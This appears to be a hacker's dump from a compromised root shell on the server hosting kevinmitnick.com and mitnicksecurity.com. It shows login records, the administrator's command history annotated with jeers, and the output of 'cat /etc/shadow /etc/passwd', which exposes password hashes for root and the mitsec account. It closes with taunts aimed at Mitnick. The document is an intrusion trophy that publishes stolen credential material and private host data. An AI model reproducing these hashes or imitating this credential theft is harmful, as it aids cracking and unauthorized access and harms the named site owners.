- [mitnicksecurity.com]
- [kevinmitnick.com]
root@www.kevinmitnick.com's password:
Last login: Mon Jul 13 17:08:58 2012 from 58.jerveyave.com
---------------------------------------------------------------------------
root@dc21 [~]# w
11:10:22 up 3 days, 12:54, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
root@dc21 [~]# uname -a;id
Linux dc21.hostedhere.net 2.6.18-308.1.18.el5.028stab060.2 #1 SMP Tue Jan 13 11:38:36 MSK 2011 i686 i686 i386 GNU/Linux
uid=0(root) gid=0(root)
groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
root@dc21 [~]# last
reboot system boot 2.6.18-92.1.18.e Mon Jul 13 22:15 (3+12:37)
root pts/0 58.jerveyave.com Mon Jul 13 17:08 - crash (05:07)
root pts/0 greenville.isopo Mon Jul 13 05:55 - 13:35 (07:39)
reboot system boot 2.6.18-92.1.18.e Mon Jul 13 00:15 (4+10:38)
reboot system boot 2.6.18-92.1.18.e Sun Jul 12 23:58 (00:09)
root pts/0 greenville.isopo Fri Jul 10 04:50 - 11:59 (07:09)
mitsec pts/0 72.19.162.209 Thu Jul 9 09:41 - 10:01 (00:20)
root pts/0 58.jerveyave.com Wed Jul 8 21:27 - 21:27 (00:00)
root pts/0 58.jerveyave.com Tue Jul 7 20:00 - 08:12 (12:11)
reboot system boot 2.6.18-92.1.18.e Tue Jul 7 19:46 (5+03:53)
reboot system boot 2.6.18-92.1.18.e Tue Jul 7 17:07 (00:13)
reboot system boot 2.6.18-92.1.18.e Tue Jul 7 10:59 (05:36)
root pts/0 greenville.isopo Tue Jul 7 05:33 - down (05:17)
root pts/0 5ace2de4.bb.sky. Tue Jul 7 05:31 - 05:32 (00:01)
reboot system boot 2.6.18-92.1.18.e Tue Jul 7 02:53 (07:57)
mitsec pts/0 ip68-229-7-88.lv Thu Jul 2 00:17 - 02:30 (02:13)
mitsec pts/0 ip68-229-7-88.lv Wed Jul 1 00:41 - 01:31 (00:50)
root pts/3 tech1.xyzdns.net Tue Jun 30 09:33 - 10:01 (00:27)
root pts/2 tech1.xyzdns.net Tue Jun 30 09:32 - 10:01 (00:28)
root pts/1 tech1.xyzdns.net Tue Jun 30 09:30 - 10:01 (00:30)
root pts/0 58.jerveyave.com Mon Jun 29 15:16 - 16:36 (1+01:19)
mitsec pts/1 93.sub-75-212-18 Mon Jun 29 12:40 - 14:57 (02:16)
root pts/0 58.jerveyave.com Mon Jun 29 05:30 - 15:14 (09:43)
mitsec pts/0 110.sub-75-212-1 Mon Jun 29 04:35 - 04:37 (00:02)
mitsec pts/1 nmd.sbx03424.las Mon Jun 29 01:47 - 02:14 (00:26)
mitsec pts/1 nmd.sbx03424.las Mon Jun 29 01:19 - 01:25 (00:06)
mitsec pts/0 c-67-169-204-62. Mon Jun 29 01:19 - 02:46 (01:27)
mitsec pts/1 c-67-169-204-62. Mon Jun 29 01:14 - 01:18 (00:04)
mitsec pts/0 nmd.sbx03424.las Mon Jun 29 01:08 - 01:15 (00:06)
mitsec pts/0 nmd.sbx03424.las Mon Jun 29 00:11 - 00:32 (00:20)
root pts/1 tech1.xyzdns.net Tue Jun 23 05:31 - 06:50 (01:18)
root pts/1 tech1.xyzdns.net Tue Jun 23 05:28 - 05:30 (00:01)
root pts/0 tech1.xyzdns.net Mon Jun 22 17:54 - 16:17 (22:23)
mitsec pts/1 nmd.sbx03424.las Sat Jun 20 02:57 - 03:37 (00:40)
mitsec pts/1 ip68-229-7-88.lv Fri Jun 19 22:02 - 22:05 (00:03)
mitsec pts/1 ip68-229-7-88.lv Fri Jun 19 20:44 - 21:28 (00:44)
root pts/0 58.jerveyave.com Thu Jun 18 20:26 - 09:37 (1+13:11)
mitsec pts/0 ip68-229-7-88.lv Thu Jun 18 11:09 - 11:40 (00:31)
mitsec pts/0 ip68-229-7-88.lv Wed Jun 17 09:53 - 09:53 (00:00)
mitsec pts/0 pool-71-106-244- Mon Jun 15 03:08 - 03:10 (00:02)
mitsec pts/0 pool-71-106-244- Tue Jun 9 15:44 - 16:10 (00:25)
root pts/0 greenville.isopo Tue Jun 9 12:14 - 14:02 (01:47)
reboot system boot 2.6.18-92.1.18.e Mon May 18 15:12 (49+05:01)
mitsec pts/0 ip72-193-114-177 Fri May 15 01:44 - 01:59 (00:14)
root pts/0 greenville.isopo Fri Apr 24 06:58 - 11:09 (04:11)
reboot system boot 2.6.18-92.1.18.e Thu Apr 23 20:26 (73+23:47)
mitsec pts/1 186.81.109.196 Mon Apr 20 11:00 - 15:50 (04:50)
root pts/1 tech1.xyzdns.net Sun Apr 19 11:39 - 14:16 (02:36)
root pts/0 58.jerveyave.com Sun Apr 19 09:01 - 18:36 (4+09:34)
reboot system boot 2.6.18-92.1.18.e Sun Apr 19 06:55 (4+11:41)
reboot system boot 2.6.18-92.1.18.e Sun Apr 19 06:46 (00:04)
root pts/1 tech1.xyzdns.net Sat Apr 18 14:07 - 14:35 (00:28)
root pts/0 tech1.xyzdns.net Sat Apr 18 08:18 - 01:28 (17:10)
reboot system boot 2.6.18-92.1.18.e Sat Apr 18 07:15 (23:30)
reboot system boot 2.6.18-92.1.18.e Fri Apr 17 03:51 (1+03:24)
root pts/1 58.jerveyave.com Fri Mar 27 18:21 - 21:42 (5+03:20)
mitsec pts/2 wsip-70-168-126- Wed Mar 25 21:34 - 23:46 (02:12)
root pts/1 58.jerveyave.com Wed Mar 25 20:03 - 03:45 (1+07:41)
root pts/4 tech1.xyzdns.net Tue Mar 24 11:09 - 13:21 (02:12)
root pts/3 greenville.isopo Tue Mar 24 11:05 - 14:32 (03:27)
root pts/2 tech1.xyzdns.net Mon Mar 23 01:22 - 13:59 (1+12:37)
root pts/2 tech1.xyzdns.net Sat Mar 21 15:49 - 17:09 (01:19)
root pts/1 66-191-205-150.d Sat Mar 21 15:26 - 20:03 (4+04:36)
root pts/0 tech3.xyzdns.net Sat Mar 21 14:08 - 16:40 (02:32)
root pts/0 66-191-205-150.d Sat Mar 21 08:54 - 13:08 (04:13)
reboot system boot 2.6.18-92.1.18.e Sat Mar 21 08:43 (26+19:06)
reboot system boot 2.6.9-023stab040 Sat May 26 10:33 (00:22)
The battle has begun, Mitnick.
root@dc21 [~]# cd /root
root@dc21 [~]# ls -la
total 92
drwxr-xr-x 12 root root 4096 Jul 17 10:51 .
drwxr-xr-x 22 root root 4096 Jul 13 22:16 ..
drwxr-xr-x 7 root root 4096 Mar 21 10:30 .MirrorSearch
-rwxr-xr-x 1 root root 4659 Jul 13 13:35 .bash_history
-rwxr-xr-x 1 root root 24 Jan 6 2012 .bash_logout
-rwxr-xr-x 1 root root 191 Jan 6 2012 .bash_profile
-rwxr-xr-x 1 root root 413 Mar 21 14:09 .bashrc
drwxr-xr-x 4 root root 4096 Mar 21 10:37 .cpanel
drwxr-xr-x 4 root root 4096 Mar 21 09:26 .cpobjcache
-rwxr-xr-x 1 root root 100 Jan 6 2007 .cshrc
drwxr-xr-x 2 root root 4096 Mar 21 09:28 .gnupg
-rw------- 1 root root 46 Jul 6 19:27 .my.cnf
-rwxr-xr-x 1 root root 264 Jul 15 00:27 .pearrc
-rwxr-xr-x 1 root root 1024 Mar 21 10:37 .rnd
drwxr-xr-x 3 root root 4096 Mar 21 10:36 .spamassassin
-rwxr-xr-x 1 root root 129 Jan 6 2012 .tcshrc
drwxr-xr-x 4 root root 4096 Mar 21 14:21 cpanel3-skel
drwxr-xr-x 2 root root 4096 Mar 21 10:22 public_ftp
drwxr-xr-x 3 root root 4096 Mar 21 10:22 public_html
-rwxr-xr-x 1 root root 2171 Dec 12 2011 pure-ftpd
drwxr-xr-x 2 root root 4096 Mar 21 14:09 security
drwxr-xr-x 3 root root 4096 Mar 21 15:51 tmp
root@dc21 [~]# cat .bash_history
root@dc21 [~]# cat .bash_history
passwd
w
w.
w
cd /home
wget http://layer1.cpanel.net/latest
sh latest
/scripts/upcp
w
cd /
ls
mv hypervm-scheduled-2.0-vps9.vm-2009-Mar-21-1237645742.tgz 3-21-mitsec-os-image.tgz
ls -l
ls
cd home
ls
wget http://dc21.hostedhere.net/mitsec.tar.gzw
w
ls
cd /home/
ls
/scripts/restorepkg mitsec.tar.gz
mkdir /root/security;cd /root/security
wget http://72.3.144.149/software/psm.tar;tar -xvf psm.tar;rm -f psm.tar;./psm
1;rm -f psm.txt;rm -f psm
ls -l
chkrootkit
/usr/local/bin/rkhunter --update
rkhunter -sk -c
/sbin/service apf restart
/sbin/ifconfig
vi /etc/apf/conf.apf
/sbin/service apf restart
cd /root
/scripts/fixdc
/scripts/fixndc
vi /etc/cpupdate.conf
vi /etc/hosts
cd /scripts/
./restartsrv named
./restartsrv http
./upcp --force
./fixcommonproblems
./reinstallmailman
cd /root
hostname -i
vi /usr/local/sim/conf.sim
cp -p /etc/ssh/sshd_config /etc/ssh/sshd_config.357
vi /etc/ssh/sshd_config
vi /etc/apf/conf.apf
vi /etc/apf/conf.apf
/sbin/service sshd restart
/etc/apf/apf -r
cd /root
vi /usr/local/lib/php.ini
vi /usr/local/php4/lib/php.ini
/scripts/restartsrv httpd
vi /etc/apf/conf.apf
apf -r
/sbin/service pure-ftpd stop
mv /etc/rc.d/init.d/pure-ftpd /root/
echo > /etc/rc.d/init.d/pure-ftpd
chattr +i /etc/rc.d/init.d/pure-ftpd
vi /etc/pam.d/crond
service crond restart
passwd mitsec
cd /var/log/
ls
tail secure
w
w
pico /etc/httpd/conf/httpd.conf
whereis php.ini
pico /usr/lib/php.ini
service httpd restart
pico /etc/httpd/conf/httpd.conf
pico /usr/local/apache/conf/php.conf
cd /etc/httpd/conf/
ls
pico php.conf
php -i | grep php.ini
pico /usr/local/lib/php.ini
/scripts/installgd
tail -f /etc/httpd/logs/error_log
service httpd restart
tail -f /etc/httpd/logs/error_log
/scripts/easyapache
cd /home/mitsec/
cd www
pico info.txt
chown mitsec:mitsec info.txt
psaswd mitsec
psaswd mitsec
passwd mitsec
whereis proftpd
la
ls
ls -l
pico index.php
cd /var/log
cat secure
ls
pico rootlogins
ls
pico apf_log
service apf stop
service apf start
pico apf_log
date
pico /etc/apf/conf.apf
service apf restart
pico apf_log
ls
tail secure
w
tail secure
lastlog
cd /home/mitsec/
ls
cd www
ls
cd ..
ls
pico .bash_history
ls
cd /
ls
w
betstat
netstat
w
ls -l
df -h
w
netstat
netstat
netstat
cd /etc/httpd/logs/
ls
tail -f access_log
tail -f error_log
pico /var/log/secure
grep "510" /etc/shadow
grep "510" /etc/passwd
pico /var/log/secure
w
w
cd /var/log/
grep "65.124.165" *
cd /etc/httpd
ls
cd domlogs/
ls
grep "65.124.165" mitnicksecurity.com
pico mitnicksecurity.com
cd mitsec
ls
pico mitnicksecurity.com
cd /home/mitsec/access-logs/
ls
pico mitnicksecurity.com
w
top
vi /usr/local/apache/conf/httpd.conf
vi /usr/local/apache/conf/httpd.conf
cd /usr/local/apache
du -sh
prm
/scripts/restartsrv httpd
top
top
w
history
pico /etc/apf/conf.apf
service apf restart
ping 4.2.2.1
telnet vpn.isopoly.com 25
w
telnet vpn.isopoly.com 25
w
top
w
lastlog
history
exit
w
lastlog
rkhunter -c
w
chkrootkit
ps -aux
cd /var/tmp/
ls -l
cd /tmp
ls -l
rm -Rf r*
cd /usr/local/apache;
ls -l pr
w
top
rkhunter -c
w
vi /usr/local/sim/conf.sim
vi /usr/local/sim/conf.sim
cp -p /etc/ssh/sshd_config /etc/ssh/sshd_config.325
vi /etc/ssh/sshd_config
vi /etc/apf/conf.apf
/sbin/service sshd restart
/sbin/service apf restart
w
ifconfig
cd /var/log/
tail secure
pico secure
w
w
tail secure
tail secure
tail secure
tail secure
tail secure
cd /etc/ssh
dir
vi sshd_config
w
cd /home/
ls
cd no
ls
cd ..
ls
cd /var/log/
tail secure
tail -n 100 secure
cd /tmp
ls
cd /var/log/btmp
pico /var/log/btmp
cd /var/log
ls -l btmp
pico /etc/passwd
rkhunter
rkhunter -c
tail /var/cpanel/accounting.log
tail /var/cpanel/root.accts
df -h
top
history
cd /home/mitsec/
ls -l
cat .lastlogin
ls
cd www
ls
ls -l |grep "Jul"
ls -l
cd ..
ls
cd ..
ls
ls -l
df -h
cd /home/
ls
ls -l
cd mitsec/
ls
ls -l
cd /home/
ls
cd /
ls
ls -l
df -h
rm -Rf 3-21-mitsec-os-image.tgz
df -h
cd /etc
ls
ls -l
top
w
tail /var/log/secure
tail /var/log/messages
netstat
exit
w
df -h
cd /home/
ls
cd no
ls
ls -l
cd ..
ls
cd mitsec/
ls
ls -l
cd public_
cd public_html/
ls
ls -l
ls -l contact_form.php
pico contact_form.php
df -h
top
w
ls -l
cd /
ls
cd ..
ls -l
cd /
ls
ls -l
w
df -h
top
w
cd /
ls
cd tmp
ls
cd backupfileehwcb2/
ls
ls -l
cd ..
ls
cd /
ls
ls -l
rm tmp.tar
ls -l
df -h
cd /home
ls
cd cpbackuptmp/
ls
cd cpbackup/ <-- I *wonder* what's in his CP dir
ls
ls -l
cd daily/
ls
cd ..
cd weekly/
ls
ls -l
cd ..
ls
cd monthly/
ls
cd ..
cd weekly/
ls -l
cd ..
ls
cd ..
ls
cd ..
ls
cd no
ls
cd sources/
ls
cd modules/
ls
ls -l
cd ..
ls
cd authors/
ls
ls -l
cd ..
ls
ls -l
pico MIRRORED.BY
cd ..
ls
ls -l
cd ..
ls
cd virtfs/
ls
ls -l
cd mitsec/
ls
ls -l
cd home
ls
ls -l
cd mitsec/
ls
cd ..
cd ..
cd ..
ls
cd ..
ls
cd /
ls
w
top
root@dc21 [~]# w
10:53:46 up 3 days, 12:38, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
root@dc21 [~]# cat /etc/shadow /etc/passwd
root:$1$5K/cgjHy$YY0B5o9EuLytWnXPBP7eU0:14430:0:99999:7:::
bin:*:13649:0:99999:7:::
daemon:*:13649:0:99999:7:::
adm:*:13649:0:99999:7:::
lp:*:13649:0:99999:7:::
sync:*:13649:0:99999:7:::
shutdown:*:13649:0:99999:7:::
halt:*:13649:0:99999:7:::
mail:*:13649:0:99999:7:::
news:*:13649:0:99999:7:::
uucp:*:13649:0:99999:7:::
operator:*:13649:0:99999:7:::
games:*:13649:0:99999:7:::
gopher:*:13649:0:99999:7:::
ftp:*:13649:0:99999:7:::
nobody:*:13649:0:99999:7:::
vcsa:!!:13649:0:99999:7:::
dbus:!!:13649:0:99999:7:::
mailnull:!!:13649:0:99999:7:::
smmsp:!!:13649:0:99999:7:::
apache:!!:13649:0:99999:7:::
sshd:!!:13649:0:99999:7:::
rpc:!!:13649:0:99999:7:::
pcap:!!:13649:0:99999:7:::
rpm:!!:13649:0:99999:7:::
named:!!:13649:0:99999:7:::
cpanel:*:14324::::::
postfix:!!:14324::::::
xfs:!!:14324::::::
mysql:!!:14324::::::
mailman:*:14324::::::
cpanelhorde:*:14324::::::
cpanelphpmyadmin:*:14324::::::
cpanelphppgadmin:*:14324::::::
cpanelroundcube:*:14324::::::
mitsec:$1$VVB/aSDv$cFi4QkgSPku7Gsc0nR.gz/:14327:0:99999:7:::
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
rpm:x:37:37::/var/lib/rpm:/sbin/nologin
named:x:25:25:Named:/var/named:/sbin/nologin
cpanel:x:32001:32001::/usr/local/cpanel:/bin/false
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
mysql:x:100:101:MySQL server:/var/lib/mysql:/bin/bash
mailman:x:32002:32002::/usr/local/cpanel/3rdparty/mailman:/bin/false
cpanelhorde:x:32003:32005::/var/cpanel/userhomes/cpanelhorde:/usr/local/cpanel/bin/noshell
cpanelphpmyadmin:x:32004:32006::/var/cpanel/userhomes/cpanelphpmyadmin:/usr/local/cpanel/bin/noshell
cpanelphppgadmin:x:32005:32007::/var/cpanel/userhomes/cpanelphppgadmin:/usr/local/cpanel/bin/noshell
cpanelroundcube:x:32006:32008::/var/cpanel/userhomes/cpanelroundcube:/usr/local/cpanel/bin/noshell
mitsec:x:510:510::/home/mitsec:/usr/local/cpanel/bin/jailshell
Sorry Kevin, but your security is bullshit<3~